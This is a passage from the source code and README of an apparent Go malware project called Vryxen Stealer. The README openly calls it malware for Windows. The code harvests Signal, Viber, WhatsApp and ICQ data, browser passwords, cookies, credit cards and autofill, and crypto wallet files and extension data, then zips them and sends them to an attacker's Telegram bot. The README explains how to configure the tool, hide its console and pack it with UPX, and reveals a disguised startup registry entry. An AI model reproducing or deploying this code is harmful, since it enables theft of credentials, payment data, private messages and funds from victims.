filepath.Join(os.Getenv("USERPROFILE"), "AppData", "Roaming", "ICQ") 99 | if _, err := os.Stat(icqFolder); os.IsNotExist(err) { 100 | return 101 | } 102 | icqSession := filepath.Join(folderMessaging, "ICQ") 103 | os.MkdirAll(icqSession, os.ModePerm) 104 | fileutil.CopyDir(icqFolder, icqSession) 105 | } 106 | 107 | func signalStealer(folderMessaging string) { 108 | signalFolder := filepath.Join(os.Getenv("USERPROFILE"), "AppData", "Roaming", "Signal") 109 | if _, err := os.Stat(signalFolder); os.IsNotExist(err) { 110 | return 111 | } 112 | signalSession := filepath.Join(folderMessaging, "Signal") 113 | os.MkdirAll(signalSession, os.ModePerm) 114 | sqlFolder := filepath.Join(signalFolder, "sql") 115 | fileutil.CopyDir(sqlFolder, signalSession) 116 | attachmentsFolder := filepath.Join(signalFolder, "attachments.noindex") 117 | fileutil.CopyDir(attachmentsFolder, signalSession) 118 | configJson := filepath.Join(signalFolder, "config.json") 119 | fileutil.CopyFile(configJson, signalSession) 120 | } 121 | 122 | func viberStealer(folderMessaging string) { 123 | viberFolder := filepath.Join(os.Getenv("USERPROFILE"), "AppData", "Roaming", "ViberPC") 124 | if _, err := os.Stat(viberFolder); os.IsNotExist(err) { 125 | return 126 | } 127 | viberSession := filepath.Join(folderMessaging, "Viber") 128 | os.MkdirAll(viberSession, os.ModePerm) 129 | 130 | rootFiles, _ := filepath.Glob(filepath.Join(viberFolder, "*.db*")) 131 | for _, file := range rootFiles { 132 | fileutil.CopyFile(file, viberSession) 133 | } 134 | 135 | directories, _ := filepath.Glob(filepath.Join(viberFolder, "*")) 136 | for _, dir := range directories { 137 | if fi, err := os.Stat(dir); err == nil && fi.IsDir() { 138 | fileutil.CopyDir(dir, filepath.Join(viberSession, filepath.Base(dir))) 139 | } 140 | } 141 | } 142 | 143 | func whatsappStealer(folderMessaging string) { 144 | whatsappSession := filepath.Join(folderMessaging, "Whatsapp") 145 | os.MkdirAll(whatsappSession, os.ModePerm) 146 | 147 | regexPattern := `[a-z0-9]+\.[Ww]hatsappDesktop_[a-z0-9]+` 148 | parentFolders, _ := filepath.Glob(filepath.Join(os.Getenv("LOCALAPPDATA"), "Packages", regexPattern)) 149 | for _, parentFolder := range parentFolders { 150 | localStateFolders, _ := filepath.Glob(filepath.Join(parentFolder, "**", "LocalState")) 151 | for _, lsFolder := range localStateFolders { 152 | profilePicturesFolder, _ := filepath.Glob(filepath.Join(lsFolder, "profilePictures")) 153 | for _, ppFolder := range profilePicturesFolder { 154 | profilePicturesDestination := filepath.Join(whatsappSession, filepath.Base(lsFolder), "profilePictures") 155 | fileutil.CopyDir(ppFolder, profilePicturesDestination) 156 | } 157 | filesToCopy, _ := filepath.Glob(filepath.Join(lsFolder, "*.db*")) 158 | for _, file := range filesToCopy { 159 | fileutil.CopyFile(file, filepath.Join(whatsappSession, filepath.Base(lsFolder))) 160 | } 161 | } 162 | } 163 | } 164 | -------------------------------------------------------------------------------- /pkg/utils/fileutil/fileutil.go: -------------------------------------------------------------------------------- 1 | package fileutil 2 | 3 | import ( 4 | "bufio" 5 | "fmt" 6 | "io" 7 | "io/ioutil" 8 | "os" 9 | "path/filepath" 10 | "strings" 11 | 12 | "github.com/alexmullins/zip" 13 | ) 14 | 15 | func AppendFile(path string, line string) { 16 | file, _ := os.OpenFile(path, os.O_WRONLY|os.O_APPEND|os.O_CREATE, 0644) 17 | defer file.Close() 18 | file.WriteString(line + "\n") 19 | } 20 | 21 | func Tree(path string, prefix string, isFirstDir ...bool) string { 22 | var sb strings.Builder 23 | 24 | files, _ := ioutil.ReadDir(path) 25 | for i, file := range files { 26 | isLast := i == len(files)-1 27 | var pointer string 28 | if isLast { 29 | pointer = prefix + "└── " 30 | } else { 31 | pointer = prefix + "├── " 32 | } 33 | if isFirstDir == nil { 34 | pointer = prefix 35 | } 36 | if file.IsDir() { 37 | fmt.Fprintf(&sb, "%s📂 - %s\n", pointer, file.Name()) 38 | if isLast { 39 | sb.WriteString(Tree(filepath.Join(path, file.Name()), prefix+" ", false)) 40 | } else { 41 | sb.WriteString(Tree(filepath.Join(path, file.Name()), prefix+"│ ", false)) 42 | } 43 | } else { 44 | fmt.Fprintf(&sb, "%s📄 - %s (%.2f kb)\n", pointer, file.Name(), float64(file.Size())/1024) 45 | } 46 | } 47 | 48 | tree := sb.String() 49 | if len(tree) > 4090 { 50 | tree = "Too many files to display" 51 | } 52 | return tree 53 | } 54 | 55 | func Zip(dirPath string, zipName string) error { 56 | zipFile, err := os.Create(zipName) 57 | if err != nil { 58 | return err 59 | } 60 | defer zipFile.Close() 61 | 62 | zipWriter := zip.NewWriter(zipFile) 63 | defer zipWriter.Close() 64 | 65 | err = filepath.Walk(dirPath, func(filePath string, info os.FileInfo, err error) error { 66 | if err != nil { 67 | return err 68 | } 69 | 70 | if info.IsDir() { 71 | return nil 72 | } 73 | 74 | relPath, err := filepath.Rel(dirPath, filePath) 75 | if err != nil { 76 | return err 77 | } 78 | 79 | zipEntry, err := zipWriter.Create(relPath) 80 | if err != nil { 81 | return err 82 | } 83 | 84 | file, err := os.Open(filePath) 85 | if err != nil { 86 | return err 87 | } 88 | defer file.Close() 89 | 90 | _, err = io.Copy(zipEntry, file) 91 | if err != nil { 92 | return err 93 | } 94 | 95 | return nil 96 | }) 97 | 98 | if err != nil { 99 | return err 100 | } 101 | 102 | return nil 103 | } 104 | 105 | func ZipWithPassword(dirPath string, zipName string, password string) error { 106 | zipFile, err := os.Create(zipName) 107 | if err != nil { 108 | return err 109 | } 110 | defer zipFile.Close() 111 | 112 | zipWriter := zip.NewWriter(zipFile) 113 | defer zipWriter.Close() 114 | 115 | err = filepath.Walk(dirPath, func(filePath string, info os.FileInfo, err error) error { 116 | if err != nil { 117 | return err 118 | } 119 | 120 | if info.IsDir() { 121 | return nil 122 | } 123 | 124 | relPath, err := filepath.Rel(dirPath, filePath) 125 | if err != nil { 126 | return err 127 | } 128 | 129 | zipEntry, err := zipWriter.Encrypt(relPath, password) 130 | if err != nil { 131 | return err 132 | } 133 | 134 | file, err := os.Open(filePath) 135 | if err != nil { 136 | return err 137 | } 138 | defer file.Close() 139 | 140 | _, err = io.Copy(zipEntry, file) 141 | if err != nil { 142 | return err 143 | } 144 | 145 | return nil 146 | }) 147 | 148 | if err != nil { 149 | return err 150 | } 151 | 152 | return nil 153 | } 154 | 155 | func Copy(src, dst string) (err error) { 156 | file, err := os.Stat(src) 157 | if err != nil { 158 | return err 159 | } 160 | 161 | if file.IsDir() { 162 | err = CopyDir(src, dst) 163 | } else { 164 | err = CopyFile(src, dst) 165 | } 166 | 167 | return 168 | } 169 | 170 | func CopyFile(src, dst string) (err error) { 171 | in, err := os.Open(src) 172 | if err != nil { 173 | return 174 | } 175 | defer in.Close() 176 | 177 | out, err := os.Create(dst) 178 | if err != nil { 179 | return 180 | } 181 | defer func() { 182 | if e := out.Close(); e != nil { 183 | err = e 184 | } 185 | }() 186 | 187 | _, err = io.Copy(out, in) 188 | if err != nil { 189 | return 190 | } 191 | 192 | err = out.Sync() 193 | if err != nil { 194 | return 195 | } 196 | 197 | si, err := os.Stat(src) 198 | if err != nil { 199 | return 200 | } 201 | err = os.Chmod(dst, si.Mode()) 202 | if err != nil { 203 | return 204 | } 205 | 206 | return 207 | } 208 | 209 | func CopyDir(src string, dst string) (err error) { 210 | src = filepath.Clean(src) 211 | dst = filepath.Clean(dst) 212 | 213 | si, err := os.Stat(src) 214 | if err != nil { 215 | return err 216 | } 217 | if !si.IsDir() { 218 | return fmt.Errorf("source is not a directory") 219 | } 220 | 221 | _, err = os.Stat(dst) 222 | if err != nil && !os.IsNotExist(err) { 223 | return 224 | } 225 | if err == nil { 226 | os.RemoveAll(dst) 227 | } 228 | 229 | err = os.MkdirAll(dst, si.Mode()) 230 | if err != nil { 231 | return 232 | } 233 | 234 | entries, err := ioutil.ReadDir(src) 235 | if err != nil { 236 | return 237 | } 238 | 239 | for _, entry := range entries { 240 | srcPath := filepath.Join(src, entry.Name()) 241 | dstPath := filepath.Join(dst, entry.Name()) 242 | 243 | if entry.IsDir() { 244 | err = CopyDir(srcPath, dstPath) 245 | if err != nil { 246 | return 247 | } 248 | } else { 249 | if entry.Mode()&os.ModeSymlink != 0 { 250 | continue 251 | } 252 | 253 | err = CopyFile(srcPath, dstPath) 254 | if err != nil { 255 | return 256 | } 257 | } 258 | } 259 | 260 | return 261 | } 262 | 263 | func IsDir(path string) bool { 264 | fileInfo, err := os.Stat(path) 265 | if err != nil { 266 | return false 267 | } 268 | return fileInfo.IsDir() 269 | } 270 | 271 | func Exists(path string) bool { 272 | _, err := os.Stat(path) 273 | return !os.IsNotExist(err) 274 | } 275 | 276 | func ReadFile(path string) (string, error) { 277 | bytes, err := os.ReadFile(path) 278 | if err != nil { 279 | return "", err 280 | } 281 | return string(bytes), nil 282 | } 283 | 284 | func ReadLines(path string) ([]string, error) { 285 | f, err := os.Open(path) 286 | if err != nil { 287 | return nil, err 288 | } 289 | defer f.Close() 290 | 291 | result := make([]string, 0) 292 | buf := bufio.NewReader(f) 293 | 294 | for { 295 | line, _, err := buf.ReadLine() 296 | l := string(line) 297 | if err == io.EOF { 298 | break 299 | } 300 | if err != nil { 301 | continue 302 | } 303 | result = append(result, l) 304 | } 305 | 306 | return result, nil 307 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |
2 | Forks 3 | Stargazers 4 | Issues 5 | MIT License 6 |
7 | 8 |

Vryxen Stealer

9 |

Go-written Malware Targeting Windows systems, extracting User Data from Browsers, Crypto Wallets and more, from every user on every disk.

10 | 11 |
12 | Vryxen 13 | Vryxen Chat 14 | 15 |
16 | 17 | 18 | --- 19 | 20 |
21 | Table of Contents 22 |
    23 |
  1. 24 | Getting Started 25 | 29 |
    2. 30 |
  2. Usage
    3. 31 |
  3. Preview
    4. 32 |
  4. Remove
    5. 33 |
  5. Contributing
    6. 34 |
  6. License
    7. 35 |
  7. Contact
    8. 36 |
  8. Acknowledgments
    9. 37 |
  9. Disclaimer
38 |
39 | 40 | ## Getting started 41 | 42 | ### Prerequisites 43 | 44 | * [Git](https://git-scm.com/downloads) 45 | * [The Go Programming Language](https://go.dev/dl/) 46 | 47 | ### Installation 48 | To install this project using Git, follow these steps: 49 | 50 | - Clone the Repository: 51 | 52 | ```bash 53 | git clone https://github.com/unf6/vryxen 54 | ``` 55 | - Navigate to the Project Directory: 56 | 57 | ```bash 58 | cd vryxen 59 | ``` 60 | 61 | > https://www.youtube.com/watch?v=wM5A8ew2EO0&t=5s 62 | 63 | ## Usage 64 | 65 | You can use the Project template: 66 | 67 | - Open `cmd/main.go` and edit config with your Telegram Bot Token, Your Chat Id, and your crypto addresses 68 | 69 | - Build the template: (reduce binary size by using `-s -w`) 70 | 71 | ```bash 72 | go build -ldflags "-s -w" 73 | ``` 74 | 75 | - You can hide the console without `hideconsole` module (you must remove `common.IsAlreadyRunning()` check from `cmd/main.go` before) by running 76 | 77 | ```bash 78 | go build -ldflags "-s -w -H=windowsgui" 79 | ``` 80 | 81 | - You can also optionally pack the output executable with UPX which will reduce the binary size from ~10MB to ~3MB. To do this, install [UPX](https://github.com/upx/upx/releases/) and run 82 | 83 | ```bash 84 | upx.exe --ultra-brute vryxen.exe 85 | ``` 86 | 87 | - You can also use vryxen in your own Go code. Just import the desired module like this: 88 | ```go 89 | package main 90 | 91 | import "github.com/unf6/vryxen/internal/hc" 92 | 93 | func main() { 94 | HideConsole.Hide() 95 | } 96 | ``` 97 | 98 | ## Preview 99 | 100 | ![](.github/assets/browsers.png) 101 | 102 | ![](.github/assets/system.png) 103 | 104 | ![](.github/assets/system-screenshot.png) 105 | 106 | ![](.github/assets/commonfiles.png) 107 | 108 | ![](.github/assets/vpns.png) 109 | 110 | ![](.github/assets/wallets.png) 111 | 112 | ![](.github/assets/ftps.png) 113 | 114 | 115 | # Remove 116 | 117 | This guide will help you removing vryxen from your system 118 | 119 | 1. Open powershell as administrator 120 | 121 | 2. Kill processes that could be vryxen 122 | 123 | ```bash 124 | taskkill /f /t /im vryxen.exe 125 | taskkill /f /t /im SecurityHealthSystray.exe 126 | ``` 127 | 128 | (use `tasklist` to list all running processes, vryxen.exe and SecurityHealthSystray.exe are the default names) 129 | 130 | 3. Remove vryxen from startup 131 | ```bash 132 | reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Realtek HD Audio Universal Service" /f 133 | ``` 134 | 135 | (Realtek HD Audio Universal Service is the default name) 136 | 137 | 4. Enable Windows defender: 138 | 139 | You can do it by running this [.bat script](https://github.com/TairikuOokami/Windows/blob/main/Microsoft%20Defender%20Enable.bat) (I'm not the developer behind it, make sure the file does not contain malware) 140 | 141 | ## Contributing 142 | Contributions to this project are welcome! Feel free to open issues, submit pull requests, or suggest improvements. Make sure to follow the [Contributing Guidelines](https://github.com/unf6/vryxen/blob/main/CONTRIBUTING.md) 143 | 144 | You can also support this project development by leaving a star ⭐ or by donating me. Every little tip helps! 145 | 146 | BTC: bc1qlhqlc4fy3wd98m8qmv05zu059j6am9jh4kj4v2 147 | 148 | ## License 149 | This library is released under the MIT License. See LICENSE file for more informations. 150 | 151 | 152 | ## Contact 153 | If you have any questions or need further assistance, please contact [@xretic:matrix.org 154 | ](https://matrix.to/#/@xretic:matrix.org) 155 | 156 | 157 | ## Acknowledgments 158 | [Orginal Author](https://github.com/hackirby) 159 | 160 |
161 | 162 | ## Disclaimer 163 | 164 | ### Important Notice: This tool is intended for educational purposes only. 165 | 166 | This software, referred to as xretic, is provided strictly for educational and research purposes. Under no circumstances should this tool be used for any malicious activities, including but not limited to unauthorized access, data theft, or any other harmful actions. 167 | 168 | ### Usage Responsibility: 169 | 170 | By accessing and using this tool, you acknowledge that you are solely responsible for your actions. Any misuse of this software is strictly prohibited, and the creator (xretic) disclaims any responsibility for how this tool is utilized. You are fully accountable for ensuring that your usage complies with all applicable laws and regulations in your jurisdiction. 171 | 172 | ### No Liability: 173 | 174 | The creator (xretic) of this tool shall not be held responsible for any damages or legal consequences resulting from the use or misuse of this software. This includes, but is not limited to, direct, indirect, incidental, consequential, or punitive damages arising out of your access, use, or inability to use the tool. 175 | 176 | ### No Support: 177 | 178 | The creator (xretic) will not provide any support, guidance, or assistance related to the misuse of this tool. Any inquiries regarding malicious activities will be ignored. 179 | 180 | ### Acceptance of Terms: 181 | 182 | By using this tool, you signify your acceptance of this disclaimer. If you do not agree with the terms stated in this disclaimer, do not use the software. 183 | -------------------------------------------------------------------------------- /internal/core/browsers/browsers.go: -------------------------------------------------------------------------------- 1 | package browsers 2 | 3 | import ( 4 | "fmt" 5 | "github.com/unf6/vryxen/pkg/utils/fileutil" 6 | "github.com/unf6/vryxen/pkg/utils/common" 7 | "github.com/unf6/vryxen/pkg/utils/requests" 8 | "os" 9 | "path/filepath" 10 | "strings" 11 | ) 12 | 13 | func ChromiumSteal() []Profile { 14 | var prof []Profile 15 | for _, user := range common.GetUsers() { 16 | for name, path := range GetChromiumBrowsers() { 17 | path = filepath.Join(user, path) 18 | if !fileutil.IsDir(path) { 19 | continue 20 | } 21 | 22 | browser := Browser{ 23 | Name: name, 24 | Path: path, 25 | User: strings.Split(user, "\\")[2], 26 | } 27 | 28 | var profilesPaths []Profile 29 | if strings.Contains(path, "Opera") { 30 | profilesPaths = append(profilesPaths, Profile{ 31 | Name: "Default", 32 | Path: browser.Path, 33 | Browser: browser, 34 | }) 35 | 36 | } else { 37 | folders, err := os.ReadDir(path) 38 | if err != nil { 39 | continue 40 | } 41 | for _, folder := range folders { 42 | if folder.IsDir() { 43 | dir := filepath.Join(path, folder.Name()) 44 | if fileutil.Exists(filepath.Join(dir, "Web Data")) { 45 | profilesPaths = append(profilesPaths, Profile{ 46 | Name: folder.Name(), 47 | Path: dir, 48 | Browser: browser, 49 | }) 50 | } 51 | 52 | } 53 | } 54 | } 55 | 56 | if len(profilesPaths) == 0 { 57 | continue 58 | } 59 | 60 | c := Chromium{} 61 | err := c.GetMasterKey(path) 62 | if err != nil { 63 | continue 64 | } 65 | for _, profile := range profilesPaths { 66 | profile.Logins, _ = c.GetLogins(profile.Path) 67 | profile.Cookies, _ = c.GetCookies(profile.Path) 68 | profile.CreditCards, _ = c.GetCreditCards(profile.Path) 69 | profile.Downloads, _ = c.GetDownloads(profile.Path) 70 | profile.History, _ = c.GetHistory(profile.Path) 71 | profile.Autofill, _ = c.GetAutofills(profile.Path) 72 | prof = append(prof, profile) 73 | } 74 | 75 | } 76 | } 77 | return prof 78 | } 79 | 80 | func GeckoSteal() []Profile { 81 | var prof []Profile 82 | for _, user := range common.GetUsers() { 83 | for name, path := range GetGeckoBrowsers() { 84 | path = filepath.Join(user, path) 85 | if !fileutil.IsDir(path) { 86 | continue 87 | } 88 | 89 | browser := Browser{ 90 | Name: name, 91 | Path: path, 92 | User: strings.Split(user, "\\")[2], 93 | } 94 | 95 | var profilesPaths []Profile 96 | 97 | profiles, err := os.ReadDir(path) 98 | if err != nil { 99 | continue 100 | } 101 | for _, profile := range profiles { 102 | if !profile.IsDir() { 103 | continue 104 | } 105 | dir := filepath.Join(path, profile.Name()) 106 | files, err := os.ReadDir(dir) 107 | if err != nil { 108 | continue 109 | } 110 | if len(files) <= 10 { 111 | continue 112 | } 113 | 114 | profilesPaths = append(profilesPaths, Profile{ 115 | Name: profile.Name(), 116 | Path: dir, 117 | Browser: browser, 118 | }) 119 | } 120 | 121 | if len(profilesPaths) == 0 { 122 | continue 123 | } 124 | 125 | for _, profile := range profilesPaths { 126 | g := Gecko{} 127 | g.GetMasterKey(profile.Path) 128 | profile.Logins, _ = g.GetLogins(profile.Path) 129 | profile.Cookies, _ = g.GetCookies(profile.Path) 130 | profile.Downloads, _ = g.GetDownloads(profile.Path) 131 | profile.History, _ = g.GetHistory(profile.Path) 132 | prof = append(prof, profile) 133 | } 134 | 135 | } 136 | } 137 | return prof 138 | } 139 | 140 | func Run(botToken, chatId string) { 141 | tempDir := filepath.Join(os.TempDir(), "browsers-temp") 142 | os.MkdirAll(tempDir, os.ModePerm) 143 | 144 | defer os.RemoveAll(tempDir) 145 | 146 | var profiles []Profile 147 | profiles = append(profiles, ChromiumSteal()...) 148 | profiles = append(profiles, GeckoSteal()...) 149 | 150 | if len(profiles) == 0 { 151 | return 152 | } 153 | 154 | for _, profile := range profiles { 155 | if len(profile.Logins) == 0 && len(profile.Cookies) == 0 && len(profile.CreditCards) == 0 && len(profile.Downloads) == 0 && len(profile.History) == 0 { 156 | continue 157 | } 158 | os.MkdirAll(filepath.Join(tempDir, profile.Browser.User, profile.Browser.Name, profile.Name), os.ModePerm) 159 | 160 | if len(profile.Logins) > 0 { 161 | fileutil.AppendFile(filepath.Join(tempDir, profile.Browser.User, profile.Browser.Name, profile.Name, "logins.txt"), fmt.Sprintf("%-50s %-50s %-50s", "url", "user", "pass")) 162 | for _, login := range profile.Logins { 163 | fileutil.AppendFile(fmt.Sprintf("%s\\%s\\%s\\%s\\logins.txt", tempDir, profile.Browser.User, profile.Browser.Name, profile.Name), fmt.Sprintf("%-50s %-50s %-50s", login.LoginURL, login.Username, login.Password)) 164 | } 165 | } 166 | 167 | if len(profile.Cookies) > 0 { 168 | for _, cookie := range profile.Cookies { 169 | var expires string 170 | if cookie.ExpireDate == 0 { 171 | expires = "0" 172 | } else { 173 | expires = "1" 174 | } 175 | 176 | var host string 177 | if strings.HasPrefix(cookie.Host, ".") { 178 | host = "0" 179 | } else { 180 | host = "1" 181 | } 182 | 183 | fileutil.AppendFile(filepath.Join(tempDir, profile.Browser.User, profile.Browser.Name, profile.Name, "cookies.txt"), fmt.Sprintf("%s\t%s\t%s\t%s\t%d\t%s\t%s", cookie.Host, expires, cookie.Path, host, cookie.ExpireDate, cookie.Name, cookie.Value)) 184 | } 185 | } 186 | 187 | if len(profile.CreditCards) > 0 { 188 | fileutil.AppendFile(filepath.Join(tempDir, profile.Browser.User, profile.Browser.Name, profile.Name, "credit_cards.txt"), fmt.Sprintf("%-30s %-30s %-30s %-30s %-30s", "num", "exp_m", "exp_y", "name", "addr")) 189 | for _, cc := range profile.CreditCards { 190 | fileutil.AppendFile(filepath.Join(tempDir, profile.Browser.User, profile.Browser.Name, profile.Name, "credit_cards.txt"), fmt.Sprintf("%-30s %-30s %-30s %-30s %-30s", cc.Number, cc.ExpirationMonth, cc.ExpirationYear, cc.Name, cc.Address)) 191 | } 192 | } 193 | 194 | if len(profile.Downloads) > 0 { 195 | fileutil.AppendFile(filepath.Join(tempDir, profile.Browser.User, profile.Browser.Name, profile.Name, "downloads.txt"), fmt.Sprintf("%-70s %-70s", "path", "url")) 196 | for _, download := range profile.Downloads { 197 | fileutil.AppendFile(filepath.Join(tempDir, profile.Browser.User, profile.Browser.Name, profile.Name, "downloads.txt"), fmt.Sprintf("%-70s %-70s", download.TargetPath, download.URL)) 198 | } 199 | } 200 | 201 | if len(profile.History) > 0 { 202 | fileutil.AppendFile(filepath.Join(tempDir, profile.Browser.User, profile.Browser.Name, profile.Name, "history.txt"), fmt.Sprintf("%-70s %-70s", "title", "url")) 203 | for _, history := range profile.History { 204 | fileutil.AppendFile(filepath.Join(tempDir, profile.Browser.User, profile.Browser.Name, profile.Name, "history.txt"), fmt.Sprintf("%-70s %-70s", history.Title, history.URL)) 205 | } 206 | } 207 | 208 | if len(profile.Autofill) > 0 { 209 | fileutil.AppendFile(filepath.Join(tempDir, profile.Browser.User, profile.Browser.Name, profile.Name, "autofill.txt"), fmt.Sprintf("%-70s %-70s", "name", "value")) 210 | for _, autofill := range profile.Autofill { 211 | fileutil.AppendFile(filepath.Join(tempDir, profile.Browser.User, profile.Browser.Name, profile.Name, "autofill.txt"), fmt.Sprintf("%-70s %-70s", autofill.Name, autofill.Value)) 212 | } 213 | } 214 | 215 | } 216 | tempZip := filepath.Join(os.TempDir(), "browsers.zip") 217 | if err := fileutil.Zip(tempDir, tempZip); err != nil { 218 | return 219 | } 220 | defer os.Remove(tempZip) 221 | 222 | message := fmt.Sprintf("Browsers: %s", fileutil.Tree(tempDir, "")) 223 | 224 | requests.Send2TelegramMessage(botToken, chatId, message) 225 | requests.Send2TelegramDocument(botToken, chatId, tempZip) 226 | } 227 | -------------------------------------------------------------------------------- /internal/core/cryptowallets/cryptowallets.go: -------------------------------------------------------------------------------- 1 | package wallets 2 | 3 | import ( 4 | "fmt" 5 | "os" 6 | "strings" 7 | 8 | "github.com/unf6/vryxen/internal/core/browsers" 9 | "github.com/unf6/vryxen/pkg/utils/fileutil" 10 | "github.com/unf6/vryxen/pkg/utils/requests" 11 | "github.com/unf6/vryxen/pkg/utils/common" 12 | ) 13 | 14 | func Run(botToken, chatId string) { 15 | Local(botToken, chatId) 16 | Extensions(botToken, chatId) 17 | } 18 | 19 | func Local(botToken, chatId string) { 20 | users := common.GetUsers() 21 | tempDir := fmt.Sprintf("%s\\wallets-temp", os.TempDir()) 22 | defer os.RemoveAll(tempDir) 23 | found := "" 24 | Paths := map[string]string{ 25 | "Zcash": "\\Zcash", 26 | "Armory": "\\Armory", 27 | "Bytecoin": "\\bytecoin", 28 | "Jaxx": "\\com.liberty.jaxx\\IndexedDB\\file__0.indexeddb.leveldb", 29 | "Exodus": "\\Exodus\\exodus.wallet", 30 | "Ethereum": "\\Ethereum\\keystore", 31 | "Electrum": "\\Electrum\\wallets", 32 | "AtomicWallet": "\\atomic\\Local Storage\\leveldb", 33 | "Guarda": "\\Guarda\\Local Storage\\leveldb", 34 | "Coinomi": "\\Coinomi\\Coinomi\\wallets", 35 | } 36 | 37 | for _, user := range users { 38 | userPath := fmt.Sprintf("%s\\AppData\\Roaming\\", user) 39 | 40 | for name, path := range Paths { 41 | path = fmt.Sprintf("%s%s", userPath, path) 42 | if !fileutil.IsDir(path) { 43 | continue 44 | } 45 | if err := fileutil.Copy(path, fmt.Sprintf("%s\\%s\\%s", tempDir, strings.Split(user, "\\")[2], name)); err != nil { 46 | continue 47 | } 48 | 49 | found += fmt.Sprintf("\n+ %s - %s", strings.Split(user, "\\")[2], name) 50 | } 51 | } 52 | 53 | if found == "" { 54 | return 55 | } 56 | 57 | if len(found) > 4090 { 58 | found = "-" 59 | } 60 | 61 | tempZip := fmt.Sprintf("%s\\wallets.zip", os.TempDir()) 62 | if err := fileutil.Zip(tempDir, tempZip); err != nil { 63 | return 64 | } 65 | 66 | defer os.RemoveAll(tempDir) 67 | defer os.Remove(tempZip) 68 | 69 | message := "Wallets ```" + found + "```" 70 | 71 | requests.Send2TelegramMessage(botToken, chatId, message) 72 | requests.Send2TelegramDocument(botToken, chatId, tempZip) 73 | } 74 | 75 | func Extensions(botToken, chatId string) { 76 | Paths := map[string]string{ 77 | "Authenticator": "\\Local Extension Settings\\bhghoamapcdpbohphigoooaddinpkbai", 78 | "Binance": "\\Local Extension Settings\\fhbohimaelbohpjbbldcngcnapndodjp", 79 | "Bitapp": "\\Local Extension Settings\\fihkakfobkmkjojpchpfgcmhfjnmnfpi", 80 | "BoltX": "\\Local Extension Settings\\aodkkagnadcbobfpggfnjeongemjbjca", 81 | "Coin98": "\\Local Extension Settings\\aeachknmefphepccionboohckonoeemg", 82 | "Coinbase": "\\Local Extension Settings\\hnfanknocfeofbddgcijnmhnfnkdnaad", 83 | "Core": "\\Local Extension Settings\\agoakfejjabomempkjlepdflaleeobhb", 84 | "Crocobit": "\\Local Extension Settings\\pnlfjmlcjdjgkddecgincndfgegkecke", 85 | "Equal": "\\Local Extension Settings\\blnieiiffboillknjnepogjhkgnoapac", 86 | "Ever": "\\Local Extension Settings\\cgeeodpfagjgjfhomihkjbmgjidlcdno", 87 | "ExodusWeb3": "\\Local Extension Settings\\aholpfdialjgjfhomihkjbmgjidlcdno", 88 | "Fewcha": "\\Local Extension Settings\\ebfidpplhabeedpnhjnobghokpiioolj", 89 | "Finnie": "\\Local Extension Settings\\cjmkndjhnagcfbpiemnkdpomccnjblmj", 90 | "Guarda": "\\Local Extension Settings\\hpglfhgfnhbgpjdenjgmdgoeiappafln", 91 | "Guild": "\\Local Extension Settings\\nanjmdknhkinifnkgdcggcfnhdaammmj", 92 | "HarmonyOutdated": "\\Local Extension Settings\\fnnegphlobjdpkhecapkijjdkgcjhkib", 93 | "Iconex": "\\Local Extension Settings\\flpiciilemghbmfalicajoolhkkenfel", 94 | "Jaxx Liberty": "\\Local Extension Settings\\cjelfplplebdjjenllpjcblmjkfcffne", 95 | "Kaikas": "\\Local Extension Settings\\jblndlipeogpafnldhgmapagcccfchpi", 96 | "KardiaChain": "\\Local Extension Settings\\pdadjkfkgcafgbceimcpbkalnfnepbnk", 97 | "Keplr": "\\Local Extension Settings\\dmkamcknogkgcdfhhbddcghachkejeap", 98 | "Liquality": "\\Local Extension Settings\\kpfopkelmapcoipemfendmdcghnegimn", 99 | "MEWCX": "\\Local Extension Settings\\nlbmnnijcnlegkjjpcfjclmcfggfefdm", 100 | "MaiarDEFI": "\\Local Extension Settings\\dngmlblcodfobpdpecaadgfbcggfjfnm", 101 | "Martian": "\\Local Extension Settings\\efbglgofoippbgcjepnhiblaibcnclgk", 102 | "Math": "\\Local Extension Settings\\afbcbjpbpfadlkmhmclhkeeodmamcflc", 103 | "Metamask": "\\Local Extension Settings\\nkbihfbeogaeaoehlefnkodbefgpgknn", 104 | "Metamask2": "\\Local Extension Settings\\ejbalbakoplchlghecdalmeeeajnimhm", 105 | "Mobox": "\\Local Extension Settings\\fcckkdbjnoikooededlapcalpionmalo", 106 | "Nami": "\\Local Extension Settings\\lpfcbjknijpeeillifnkikgncikgfhdo", 107 | "Nifty": "\\Local Extension Settings\\jbdaocneiiinmjbjlgalhcelgbejmnid", 108 | "Oxygen": "\\Local Extension Settings\\fhilaheimglignddkjgofkcbgekhenbh", 109 | "PaliWallet": "\\Local Extension Settings\\mgffkfbidihjpoaomajlbgchddlicgpn", 110 | "Petra": "\\Local Extension Settings\\ejjladinnckdgjemekebdpeokbikhfci", 111 | "Phantom": "\\Local Extension Settings\\bfnaelmomeimhlpmgjnjophhpkkoljpa", 112 | "Pontem": "\\Local Extension Settings\\phkbamefinggmakgklpkljjmgibohnba", 113 | "Ronin": "\\Local Extension Settings\\fnjhmkhhmkbjkkabndcnnogagogbneec", 114 | "Safepal": "\\Local Extension Settings\\lgmpcpglpngdoalbgeoldeajfclnhafa", 115 | "Saturn": "\\Local Extension Settings\\nkddgncdjgjfcddamfgcmfnlhccnimig", 116 | "Slope": "\\Local Extension Settings\\pocmplpaccanhmnllbbkpgfliimjljgo", 117 | "Solfare": "\\Local Extension Settings\\bhhhlbepdkbapadjdnnojkbgioiodbic", 118 | "Sollet": "\\Local Extension Settings\\fhmfendgdocmcbmfikdcogofphimnkno", 119 | "Starcoin": "\\Local Extension Settings\\mfhbebgoclkghebffdldpobeajmbecfk", 120 | "Swash": "\\Local Extension Settings\\cmndjbecilbocjfkibfbifhngkdmjgog", 121 | "TempleTezos": "\\Local Extension Settings\\ookjlbkiijinhpmnjffcofjonbfbgaoc", 122 | "TerraStation": "\\Local Extension Settings\\aiifbnbfobpmeekipheeijimdpnlpgpp", 123 | "Tokenpocket": "\\Local Extension Settings\\mfgccjchihfkkindfppnaooecgfneiii", 124 | "Ton": "\\Local Extension Settings\\nphplpgoakhhjchkkhmiggakijnkhfnd", 125 | "Tron": "\\Local Extension Settings\\ibnejdfjmmkpcnlpebklmnkoeoihofec", 126 | "Trust Wallet": "\\Local Extension Settings\\egjidjbpglichdcondbcbdnbeeppgdph", 127 | "Wombat": "\\Local Extension Settings\\amkmjjmmflddogmhpjloimipbofnfjih", 128 | "XDEFI": "\\Local Extension Settings\\hmeobnfnfcmdkdcmlblgagmfpfboieaf", 129 | "XMR.PT": "\\Local Extension 